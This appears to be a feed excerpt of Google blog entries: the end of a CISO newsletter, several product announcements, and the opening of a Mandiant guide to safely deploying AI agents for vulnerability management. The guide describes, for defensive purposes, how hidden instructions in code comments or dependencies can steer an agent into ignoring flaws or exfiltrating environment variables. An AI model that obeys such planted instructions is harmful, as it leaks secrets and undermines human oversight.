      &lt;figcaption class="article-video__caption h-c-page"&gt;
        
          &lt;h4 class="h-c-headline h-c-headline--four h-u-font-weight-medium h-u-mt-std"&gt;Google Cloud x Morgan Stanley: Redefining Threat Defense in the AI Era&lt;/h4&gt;
        
        
      &lt;/figcaption&gt;
    
  &lt;/figure&gt;
&lt;/div&gt;

&lt;div class="h-c-modal--video"&gt;
   &lt;a class="glue-yt-video" href="https://youtube.com/watch?v=CmGWIwgHR60"&gt;
   &lt;/a&gt;
&lt;/div&gt;

&lt;/div&gt;
&lt;div class="block-paragraph"&gt;&lt;p&gt;&lt;b&gt;Maintaining strategic human oversight&lt;/b&gt;&lt;/p&gt;&lt;p&gt;While human-speed execution cannot keep pace with automated threats, human management remains essential. We align autonomous AI agents directly with the human teams they support. In Wiz, for example, the Red agent automates penetration testing, the Blue agent drives threat investigations, and the Green agent accelerates cloud remediation.&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-pull_quote"&gt;&lt;div class="uni-pull-quote h-c-page"&gt;
  &lt;section class="h-c-grid"&gt;
    &lt;div class="uni-pull-quote__wrapper h-c-grid__col h-c-grid__col--8 h-c-grid__col-m--6 h-c-grid__col-l--6
      h-c-grid__col--offset-2 h-c-grid__col-m--offset-3 h-c-grid__col-l--offset-3"&gt;
      &lt;div class="uni-pull-quote__inner-wrapper h-c-copy h-c-copy"&gt;
        &lt;q class="uni-pull-quote__text"&gt;Every AI conversation is a security conversation. That means securing AI infrastructure requires building from the ground up, and not bolting on.&lt;/q&gt;

        
      &lt;/div&gt;
    &lt;/div&gt;
  &lt;/section&gt;
&lt;/div&gt;

&lt;/div&gt;
&lt;div class="block-paragraph"&gt;&lt;p&gt;This ensures autonomy under human supervision, empowering engineering and security teams to eliminate backlogs and secure the software development lifecycle without sacrificing speed.&lt;/p&gt;&lt;p&gt;&lt;b&gt;What’s next: AI-native, agent-driven infrastructure&lt;/b&gt;&lt;/p&gt;&lt;p&gt;The foundation of your defender's advantage starts with protecting your environments — not just from outside threats, but from internal risks like shadow AI and unauthorized agents. When employees download models and deploy agents outside of IT oversight, they create silent logic breaches and data-poisoning risks.&lt;/p&gt;&lt;p&gt;The key to countering this is enforcing Zero Trust for AI, and directing teams toward &lt;a href="https://cloud.google.com/transform/these-4-ai-governance-tips-help-counter-shadow-agents"&gt;approved architectures with proper governance&lt;/a&gt;. Every AI conversation is a security conversation. That means securing AI infrastructure requires building from the ground up, and not bolting on.&lt;/p&gt;&lt;p&gt;At Google, security is not just an added layer; it is our foundation. Our secure-by-default architecture automatically blocks nearly 15 billion unwanted emails and protects billions of users every day.&lt;/p&gt;&lt;p&gt;As the threat landscape matures, outperforming automated adversaries requires a platform built from the ground up to be AI-native and agent-driven.&lt;/p&gt;&lt;p&gt;Fight AI with AI. Learn more about how to secure your software lifecycle with &lt;a href="https://cloudonair.withgoogle.com/events/google-cloud-security-talks-june-2026?utm_source=cgc-blog&amp;amp;utm_medium=blog&amp;amp;utm_campaign=FY26-Q2-GLOBAL-STO55-onlineevent-er-dgcsm-JuneSecTl-172732&amp;amp;utm_content=blog&amp;amp;utm_term=-&amp;amp;_gl=1*y4i9t3*_ga*OTAzODg1MjU4LjE3ODIzNjE1ODI.*_ga_WH2QY8WWF5*czE3ODM3MjExMDAkbzE2JGcxJHQxNzgzNzIxMzU1JGo1MiRsMCRoMA.." target="_blank"&gt;Google AI Threat Defense&lt;/a&gt;.&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-aside"&gt;&lt;dl&gt;
    &lt;dt&gt;aside_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;title&amp;#x27;, &amp;#x27;Learn something new&amp;#x27;), (&amp;#x27;body&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fcbc9eb87f0&amp;gt;), (&amp;#x27;btn_text&amp;#x27;, &amp;#x27;Watch now&amp;#x27;), (&amp;#x27;href&amp;#x27;, &amp;#x27;https://www.youtube.com/watch?v=CmGWIwgHR60&amp;#x27;), (&amp;#x27;image&amp;#x27;, &amp;lt;GAEImage: Cloud-CISO-Perspectives-logo-A&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph"&gt;&lt;h3&gt;&lt;b&gt;In case you missed it&lt;/b&gt;&lt;/h3&gt;&lt;p&gt;Here are the latest updates, products, services, and resources from our security teams so far this month:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;FinOps for SecOps: How to optimize the agentic SOC for value&lt;/b&gt;: To be more resilient in AI adoption, CISOs should develop a disciplined "FinOps for SecOps" blueprint that maximizes threat disruption while keeping control over compute costs. Here's how. &lt;a href="https://cloud.google.com/transform/finops-for-secops-how-to-optimize-the-agentic-soc-for-value"&gt;&lt;b&gt;Read more&lt;/b&gt;&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;New IDC study: How Mandiant transforms security into a competitive advantage&lt;/b&gt;: A new IDC Business Value White Paper found that you save an average of $4.3 million, driving a 268% three-year ROI, with Mandiant Consulting. &lt;a href="https://cloud.google.com/blog/products/identity-security/new-idc-study-how-mandiant-transforms-security-into-a-competitive-advantage"&gt;&lt;b&gt;Read more&lt;/b&gt;&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Drive proactive security, prioritize risks with Google Threat Intelligence and Wiz ASM&lt;/b&gt;: To help you match your real-world exposures with real-time adversary activity, we’ve begun integrating Google Threat Intelligence with Wiz Attack Surface Management. &lt;a href="https://cloud.google.com/blog/products/identity-security/drive-proactive-security-prioritize-risks-with-google-threat-intelligence-and-wiz-asm"&gt;&lt;b&gt;Read more&lt;/b&gt;&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Shift into high gear with agents: Securing the software-defined vehicle&lt;/b&gt;: To better support and secure SDVs, Google Cloud and Valtech have partnered to develop Nexus SDV, a highly-scalable, AI-enabled connected vehicle platform. &lt;a href="https://cloud.google.com/blog/products/identity-security/shift-into-high-gear-with-agents-securing-the-software-defined-vehicle"&gt;&lt;b&gt;Read more&lt;/b&gt;&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Meet the 33 cybersecurity startups joining the Gemini Startup Forum&lt;/b&gt;: Our flagship Google for Startups program, Gemini Startup Forum: Cybersecurity, has selected its first 33 trailblazing startups. &lt;a href="https://cloud.google.com/blog/products/identity-security/meet-the-33-cybersecurity-startups-joining-the-gemini-startup-forum"&gt;&lt;b&gt;Read more&lt;/b&gt;&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Introducing k8s-aibom on GKE for automated AI bills of materials&lt;/b&gt;: We’re open-sourcing k8s-aibom, a Kubernetes controller that continuously monitors environments to detect AI runtimes and generate standard ML-BOMs. &lt;a href="https://cloud.google.com/blog/products/identity-security/introducing-k8s-aibom-on-gke-for-automated-ai-bills-of-materials"&gt;&lt;b&gt;Read more&lt;/b&gt;&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;BGP route policies: Top 3 use cases by customer demand&lt;/b&gt;: We detail the three most impactful use cases for Cloud Router BGP route policies that have emerged since 2025. &lt;a href="https://cloud.google.com/blog/products/networking/bgp-route-policies-top-3-use-cases-by-customer-demand"&gt;&lt;b&gt;Read more&lt;/b&gt;&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Contributing to U.K. financial sector resilience as a critical third party&lt;/b&gt;: The U.K. Treasury has designated Google Cloud EMEA as a critical third party (CTP) to the U.K. financial sector under the CTP regime. Here’s how that helps you. &lt;a href="https://cloud.google.com/blog/products/identity-security/contributing-to-uk-financial-sector-resilience-as-a-critical-third-party"&gt;&lt;b&gt;Read more&lt;/b&gt;&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Google Cloud confirmed to offer a safer choice for EU public sector organizations with Dutch DPIA approval&lt;/b&gt;: We understand that for the EU public sector, data protection is a prerequisite. We’re excited to reinforce this commitment with a major milestone. &lt;a href="https://cloud.google.com/blog/products/identity-security/google-cloud-confirmed-to-offer-a-safer-choice-for-eu-public-sector-organizations-with-dutch-dpia-approval"&gt;&lt;b&gt;Read more&lt;/b&gt;&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Why IaC coverage belongs on your security dashboard&lt;/b&gt;: Rethinking infrastructure-as-code coverage as a funnel that shows how much of your infrastructure is governed, traceable, and ready for remediation at speed. &lt;a href="https://www.wiz.io/blog/iac-coverage-security-dashboard" target="_blank"&gt;&lt;b&gt;Read more&lt;/b&gt;&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Inside the ProdSec playbook: Operationalizing Wiz for end-to-end cloud security&lt;/b&gt;: Rethinking infrastructure-as-code coverage as a funnel that shows how much of your infrastructure is governed, traceable, and ready for remediation at speed. &lt;a href="https://www.wiz.io/blog/how-prodsec-uses-wiz" target="_blank"&gt;&lt;b&gt;Read more&lt;/b&gt;&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Build AI security agents with Wiz MCP&lt;/b&gt;: Power AI-driven security with trusted security context, Wiz AI Agents, and Wiz AI Skills. &lt;a href="https://www.wiz.io/blog/introducing-wiz-mcp" target="_blank"&gt;&lt;b&gt;Read more&lt;/b&gt;&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Please visit the Google Cloud blog for more security stories &lt;a href="https://cloud.google.com/blog/products/identity-security"&gt;published this month&lt;/a&gt;.&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-aside"&gt;&lt;dl&gt;
    &lt;dt&gt;aside_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;title&amp;#x27;, &amp;#x27;Join the Google Cloud CISO Community&amp;#x27;), (&amp;#x27;body&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fcbc9eb80a0&amp;gt;), (&amp;#x27;btn_text&amp;#x27;, &amp;#x27;Learn more&amp;#x27;), (&amp;#x27;href&amp;#x27;, &amp;#x27;https://rsvp.withgoogle.com/events/google-cloud-ciso-community-interest-form-2026?utm_source=cgc-blog&amp;amp;utm_medium=blog&amp;amp;utm_campaign=FY25-Q1-global-GCP30328-physicalevent-er-dgcsm-parent-CISO-community-2025&amp;amp;utm_content=cisop_&amp;amp;utm_term=-&amp;#x27;), (&amp;#x27;image&amp;#x27;, &amp;lt;GAEImage: GCAT-replacement-logo-A&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph"&gt;&lt;h3&gt;&lt;b&gt;Threat Intelligence news&lt;/b&gt;&lt;/h3&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;A look at the drivers, dynamics, and applications of the pro-Russia influence ecosystem&lt;/b&gt;: Four years into Russia’s full-scale invasion of Ukraine, the pro-Russia influence ecosystem has evolved from a tool of war back into a global strategic asset. The interconnected nature of the ecosystem's disparate components makes it resilient to limited scope disruptions, a factor that defenders need to consider to mitigate pro-Russia influence threats. &lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/pro-russia-influence-ecosystem"&gt;&lt;b&gt;Read more&lt;/b&gt;&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Google’s continued disruption of malicious residential proxy networks&lt;/b&gt;: In coordination with the FBI, Lumen, and others, Google took action against the NetNut residential proxy network, also known as Popa. This action builds on our &lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/disrupting-largest-residential-proxy-network"&gt;disruption of the IPIDEA proxy network&lt;/a&gt; that took place in January 2026, and is a continuation of Google’s objective to dismantle malicious residential proxy networks. &lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/google-continued-disruption-residential-proxy-networks"&gt;&lt;b&gt;Read more&lt;/b&gt;&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;GhostApproval: A trust boundary gap in AI coding assistants&lt;/b&gt;: Learn how Wiz uncovered a category-level blind spot in modern AI coding assistants, and why the human-in-the-loop safety model fails against this classic threat. &lt;a href="https://www.wiz.io/blog/ghostapproval-a-trust-boundary-gap-in-ai-coding-assistants" target="_blank"&gt;&lt;b&gt;Read more&lt;/b&gt;&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;The latest addition to Turla’s intelligence gathering apparatus&lt;/b&gt;: Google Threat Intelligence Group (GTIG) has conducted an in-depth analysis of a .NET backdoor, tracked as STOCKSTAY, that has been continually developed and deployed by the Russia-linked threat actor Turla, one of the oldest known cyber espionage groups, since at least December 2022. As part of our continued tracking of this group, we’re providing an overview of our STOCKSTAY analysis, a timeline of key developmental and operational observations, and detailed similarities to KAZUAR to contextualize this new capability in Turla’s arsenal. &lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/stockstay-turla-intelligence-gathering"&gt;&lt;b&gt;Read more&lt;/b&gt;&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Recovering active ADFS signing keys via Machine DPAPI&lt;/b&gt;: During a recent red team engagement, Mandiant discovered that when ADFS certificates are manually rotated, configuration drift can silently leave active signing keys exposed in Machine DPAPI. Here’s how to defend against it. &lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/recovering-active-adfs-signing-keys-machine-dpapi"&gt;&lt;b&gt;Read more&lt;/b&gt;&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Please visit the Google Cloud blog for more threat intelligence stories &lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/"&gt;published this month&lt;/a&gt;.&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph"&gt;&lt;h3&gt;&lt;b&gt;Now hear this: Podcasts from Google Cloud&lt;/b&gt;&lt;/h3&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Cloud Security Podcast: Building an AI-pilled, solo vibe-coded, Clickhouse-based SIEM&lt;/b&gt;: Dan Lussier, founder, Nano, unpacks how he vibe-coded an entire SIEM from scratch during his end-of-year holiday break. &lt;a href="https://www.youtube.com/watch?v=moavwSxOwjw" target="_blank"&gt;&lt;b&gt;Listen here&lt;/b&gt;&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Cloud Security Podcast: Scaling lessons, from leading the NSA to defending the world&lt;/b&gt;: Morgan Adamski discusses how public-private partnerships and the shift to cloud infrastructure have transformed cybersecurity defense through improved intelligence sharing and collective trust. &lt;a href="https://www.youtube.com/watch?v=p_t1C02t098" target="_blank"&gt;&lt;b&gt;Listen here&lt;/b&gt;&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Cloud Security Podcast: Closest alligator to the canoe: How transforming the SOC became P0 for Lloyds Bank&lt;/b&gt;: Matt Row, chief security officer, Lloyds Bank, explains the bank's digital transformation strategy, highlighting how it modernized its security operations center to achieve a 20x reduction in human-reviewed alerts. &lt;a href="https://www.youtube.com/watch?v=ElCQ_1RD3pU" target="_blank"&gt;&lt;b&gt;Listen here&lt;/b&gt;&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Defender’s Advantage: Human-machine teaming and applying AI to frontline threat intelligence workflows&lt;/b&gt;: Jake Nicastro, AI lead, Frontline Intelligence Operations, GTIG, details how his team is shifting from simple prompt engineering to more advanced agentic workflows, focusing on a model of human-machine teaming. &lt;a href="https://open.spotify.com/episode/0mpxoAnJjVPutpEE5vTIhE" target="_blank"&gt;&lt;b&gt;Listen here&lt;/b&gt;&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;To have our Cloud CISO Perspectives post delivered twice a month to your inbox, &lt;a href="https://cloud.google.com/resources/google-cloud-ciso-newsletter-signup"&gt;sign up for our newsletter&lt;/a&gt;. We’ll be back in a few weeks with more security-related updates from Google Cloud.&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/identity-security/cloud-ciso-perspectives-how-ai-leverages-deep-context-defenders-advantage" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-07-16T16:00:00+00:00</published>
    <media:group>
      <media:content url="https://storage.googleapis.com/gweb-cloudblog-publish/images/Cloud_CISO_Perspectives_header_4_Blue.max-600x600.png" type="image/png" medium="image"/>
      <media:thumbnail url="https://storage.googleapis.com/gweb-cloudblog-publish/images/Cloud_CISO_Perspectives_header_4_Blue.max-600x600.png"/>
    </media:group>
    <link rel="enclosure" href="https://storage.googleapis.com/gweb-cloudblog-publish/images/Cloud_CISO_Perspectives_header_4_Blue.max-600x600.png" type="image/png" length="0"/>
  </entry>
  <entry>
    <id>https://blog.google/company-news/outreach-and-initiatives/grow-with-google/free-ai-training-georgia-libraries</id>
    <title>We’re partnering with the Georgia Public Library Service for no-cost career and AI training.</title>
    <updated>2026-07-16T16:00:00+00:00</updated>
    <content type="html">&lt;img src="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/Georgia_Grow_with_Google_social.max-600x600.format-webp.webp" /&gt;Google partners with the Georgia Public Library Service to provide free Career Certificates and AI training to residents statewide.</content>
    <link href="https://blog.google/company-news/outreach-and-initiatives/grow-with-google/free-ai-training-georgia-libraries" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-07-16T16:00:00+00:00</published>
    <media:group>
      <media:content url="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/Georgia_Grow_with_Google_social.max-600x600.format-webp.webp" type="image/webp" medium="image"/>
      <media:thumbnail url="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/Georgia_Grow_with_Google_social.max-600x600.format-webp.webp"/>
    </media:group>
    <link rel="enclosure" href="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/Georgia_Grow_with_Google_social.max-600x600.format-webp.webp" type="image/webp" length="0"/>
  </entry>
  <entry>
    <id>https://blog.google/products-and-platforms/products/workspace/gemini-omni-personal-avatars</id>
    <title>Create, edit and star in videos with two Google Vids updates</title>
    <updated>2026-07-16T16:00:00+00:00</updated>
    <content type="html">Text "Gemini Omni and Personal Avatars in Google Vids" surrounded by various images</content>
    <link href="https://blog.google/products-and-platforms/products/workspace/gemini-omni-personal-avatars" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-07-16T16:00:00+00:00</published>
    <media:group>
      <media:content url="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/omni-blog-header_OarEe2t.max-600x600.format-webp.webp" type="image/webp" medium="image"/>
      <media:thumbnail url="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/omni-blog-header_OarEe2t.max-600x600.format-webp.webp"/>
    </media:group>
    <link rel="enclosure" href="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/omni-blog-header_OarEe2t.max-600x600.format-webp.webp" type="image/webp" length="0"/>
  </entry>
  <entry>
    <id>https://blog.google/products-and-platforms/products/search/connected-apps</id>
    <title>Connect more of your apps to Search</title>
    <updated>2026-07-16T16:00:00+00:00</updated>
    <content type="html">Connected apps rendering</content>
    <link href="https://blog.google/products-and-platforms/products/search/connected-apps" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-07-16T16:00:00+00:00</published>
    <media:group>
      <media:content url="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/ConnectedAppshero.max-600x600.format-webp.webp" type="image/webp" medium="image"/>
      <media:thumbnail url="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/ConnectedAppshero.max-600x600.format-webp.webp"/>
    </media:group>
    <link rel="enclosure" href="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/ConnectedAppshero.max-600x600.format-webp.webp" type="image/webp" length="0"/>
  </entry>
  <entry>
    <id>https://blog.google/innovation-and-ai/products/gemini-notebook/notebooklm-gemini-notebook</id>
    <title>NotebookLM is now Gemini Notebook</title>
    <updated>2026-07-16T16:00:00+00:00</updated>
    <content type="html">NotebookLM is now Gemini Notebook</content>
    <link href="https://blog.google/innovation-and-ai/products/gemini-notebook/notebooklm-gemini-notebook" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-07-16T16:00:00+00:00</published>
    <media:group>
      <media:content url="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/gemini-notebook__cover.max-600x600.format-webp.webp" type="image/webp" medium="image"/>
      <media:thumbnail url="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/gemini-notebook__cover.max-600x600.format-webp.webp"/>
    </media:group>
    <link rel="enclosure" href="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/gemini-notebook__cover.max-600x600.format-webp.webp" type="image/webp" length="0"/>
  </entry>
  <entry>
    <id>https://blog.google/products-and-platforms/products/education/university-of-waterloo-futures-lab</id>
    <title>Reimagining higher education with the Waterloo Futures Lab</title>
    <updated>2026-07-16T16:00:00+00:00</updated>
    <content type="html">Several alumni being interviewed</content>
    <link href="https://blog.google/products-and-platforms/products/education/university-of-waterloo-futures-lab" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-07-16T16:00:00+00:00</published>
    <media:group>
      <media:content url="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/Interview_with_alumni_.max-600x600.format-webp.webp" type="image/webp" medium="image"/>
      <media:thumbnail url="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/Interview_with_alumni_.max-600x600.format-webp.webp"/>
    </media:group>
    <link rel="enclosure" href="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/Interview_with_alumni_.max-600x600.format-webp.webp" type="image/webp" length="0"/>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/topics/threat-intelligence/ai-assisted-vulnerability-management</id>
    <title>Demystifying AI Exploits: A Blueprint for AI-Assisted Vulnerability Management</title>
    <updated>2026-07-16T14:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;Written by: Jules Czarniak&lt;/p&gt;
&lt;hr /&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Introduction &lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;As highlighted in the &lt;/span&gt;&lt;a href="https://cloud.google.com/security/resources/m-trends"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Mandiant M-Trends 2026 report&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, the mean time-to-exploit (TTE) has dropped to -7 days, meaning vulnerabilities are often exploited a week before a patch even exists. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To keep pace, many security teams are exploring how to integrate large language model (LLM) agents into their codebases, development environments and continuous integration and continuous delivery (CI/CD) pipelines for automated vulnerability discovery and remediation. However, deploying privileged artificial intelligence (AI) agents without mature integration processes introduces new architectural risks. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In response to customer inquiries about how to safely integrate AI capabilities into vulnerability management workflows, this blog provides actionable guidance from Mandiant Consulting about how to establish operational guardrails for AI assisted vulnerability management, including several detailed scenarios. What each of these examples show is that security teams can accelerate workflows with AI while also upholding the structural integrity of their environments. We suggest that combining AI capabilities with deterministic controls and human intelligence in strategic ways maximizes benefits and reduces risk. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Establish Operational Guardrails to Safely Deploy AI Agents&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To safely adopt advanced AI capabilities without introducing unpredictable failures into deployment pipelines, organizations should ground their approach in established industry standards. While guidelines like the &lt;/span&gt;&lt;a href="https://www.nist.gov/itl/ai-risk-management-framework" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;NIST AI Risk Management Framework (RMF)&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and the &lt;/span&gt;&lt;a href="https://owasp.org/www-project-top-10-for-large-language-model-applications/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;OWASP Top 10 for LLMs&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; provide comprehensive baselines for identifying risks, operationalizing these controls requires a structural blueprint.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Frameworks like &lt;/span&gt;&lt;a href="https://safety.google/intl/en_sg/safety/saif/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google’s Secure AI Framework (SAIF)&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;a href="https://safety.google/intl/en_sg/safety/saif/" rel="noopener" target="_blank"&gt;&lt;span style="vertical-align: baseline;"&gt;and&lt;/span&gt;&lt;/a&gt;&lt;a href="https://storage.googleapis.com/gweb-research2023-media/pubtools/1018686.pdf" rel="noopener" target="_blank"&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google’s approach to secure AI Agents&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; provide a practical path forward, demanding that organizations extend existing deterministic controls directly into the AI execution environment. When deploying AI agents, security teams should navigate specific operational and structural risks:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Pre-agent data security and Defense-in-Depth:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Agents should not be able to access personally identifiable information (PII), protected health information (PHI), or other sensitive data. Organizations should enforce data security before the prompt reaches the model. This includes strictly using non-production environments populated with synthetic data for testing. For production, security teams should deploy a hybrid defense-in-depth model. This includes Layer 1 deterministic policy engines acting as chokepoints, alongside Layer 2 reasoning-based defenses like specialized guard models (such as &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/model-armor/overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Model Armor&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; or similar provider-agnostic guardrails) to filter out sensitive data and block malicious prompt injections before they reach the agent layer. Crucially for vulnerability discovery, security teams should treat the codebase itself as an untrusted input. Threat actors can embed indirect prompt injections within source code comments or third-party dependencies (e.g., hidden instructions telling the agent to ignore vulnerabilities or exfiltrate environment variables), making input sanitation a requirement even for internal scanning.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Cloud provider limitations and zero data retention (ZDR):&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Many cloud and LLM providers block or throttle automated offensive security probing by default to prevent abuse. Organizations should establish clear rules of engagement and authorized testing agreements to navigate acceptable use policies. Furthermore, organizations should enforce strict zero data retention (ZDR) agreements with their LLM providers to guarantee that proprietary code and discovered vulnerabilities are never used to train external models.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Workload isolation:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Agent workloads should execute in strictly isolated, unprivileged containers with dynamically limited privileges. By relying on robust sandboxing to prevent privilege escalation, if an agent hallucinates a destructive command or is hijacked via prompt injection, the blast radius remains contained.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Red Teaming:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Before deploying autonomous vulnerability scanners that can dynamically spin up sandboxes and execute code, organizations should subject the AI agents themselves to human-led red teaming as part of comprehensive assurance efforts. This validates the agent's resilience against jailbreaks, recursive logic loops, and complex prompt injections, ensuring the security tooling does not become the attack vector.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Least-Privileged Machine Identities and Human Controllers:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; While workloads should be isolated, agents inherently require privileges to generate pull requests and commit code. Security teams should ensure these agents operate under distinct, strictly scoped machine identities that tie back to human controllers to ensure accountability and user consent. Organizations should use short-lived, just-in-time (JIT) tokens bound exclusively to the specific repository and branch under review. T&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;his enforces the principle of limited agent powers and ensures that even if an agent’s container is compromised via prompt injection, the threat actor cannot pivot to modify adjacent enterprise codebases.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Supply chain resilience for skills:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; As developers augment AI with third-party skills and model context protocol (MCP) servers, security teams should treat these integrations as untrusted supply chain components. MCP plugins introduce the risk of supply chain poisoning, where a previously benign integration is silently updated with malicious dependencies. Additionally, security teams should evaluate the underlying agent orchestration frameworks themselves (e.g., LangChain, AutoGen) for inherent vulnerabilities, such as session memory poisoning or recursive loop hijacking.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
